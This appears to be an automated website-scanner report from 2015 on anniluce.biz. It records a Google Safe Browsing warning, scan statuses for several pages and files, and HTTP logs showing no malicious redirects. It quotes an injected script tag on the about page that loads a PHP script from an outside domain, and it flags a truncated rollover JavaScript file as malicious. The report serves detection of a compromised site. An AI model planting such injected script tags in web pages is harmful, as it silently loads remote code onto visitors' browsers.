Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=anniluce.biz
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://anniluce.biz/ | HTTP/1.1 302 Found Cache-Control: no-cache, no-store, must-revalidate Connection: close Date: Tue, 03 Mar 2015 17:30:10 GMT Pragma: no-cache Location: http://www.anniluce.biz/index.html Server: Apache Vary: Accept-Encoding,User-Agent Content-Type: text/html; charset=Shift_JIS Expires: Thu, 19 Nov 1981 08:52:00 GMT Set-Cookie: IndexSESSID=e6c1d5710eae7283f4fb202bbc6316af0dd77b17e182d85948d7dbde98216238; path=/ X-Powered-By: PHP/5.3.3 X-Powered-By: PleskLin | clean |
http://www.anniluce.biz/index.html | 200 OK Content-Length: 17010 Content-Type: text/html | clean |
http://www.anniluce.biz/js/rollover.js | 200 OK Content-Length: 5625 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind Antivirus reports:
| ||
http://static.getclicky.com/js | 200 OK Content-Length: 17499 Content-Type: application/x-javascript | clean |
http://anniluce.biz/about.html | 200 OK Content-Length: 12494 Content-Type: text/html | suspicious |
Suspicious code found <script type="text/javascript" src="http://poohsandbeans.com/zvxdh3xt.php?id=2461011"></script> | ||
http://anniluce.biz/js/rollover.js | 200 OK Content-Length: 5625 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function MM_preloadImages() { var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array(); var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i ) if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j ].src=a[i];}} } function MM_swapImgRestore() { var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i ) x.src=x.oSrc; } function MM_findObj(n, d) { var p,i,x; if(!d) d=document; if((p=n.ind Antivirus reports:
| ||
http://anniluce.biz/test404page.js | 404 Not Found Content-Length: 958 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: anniluce.biz
Result:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Date: Tue, 03 Mar 2015 17:30:10 GMT
Pragma: no-cache
Location: http://www.anniluce.biz/index.html
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=Shift_JIS
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: IndexSESSID=e6c1d5710eae7283f4fb202bbc6316af0dd77b17e182d85948d7dbde98216238; path=/
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin
GET / HTTP/1.1
Host: anniluce.biz
Result:
HTTP/1.1 302 Found
Cache-Control: no-cache, no-store, must-revalidate
Connection: close
Date: Tue, 03 Mar 2015 17:30:10 GMT
Pragma: no-cache
Location: http://www.anniluce.biz/index.html
Server: Apache
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=Shift_JIS
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: IndexSESSID=e6c1d5710eae7283f4fb202bbc6316af0dd77b17e182d85948d7dbde98216238; path=/
X-Powered-By: PHP/5.3.3
X-Powered-By: PleskLin
Second query (visit from search engine):
GET / HTTP/1.1
Host: anniluce.biz
Referer: http://www.google.com/search?q=anniluce.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: anniluce.biz
Referer: http://www.google.com/search?q=anniluce.biz
Result:
The result is similar to the first query. There are no suspicious redirects found.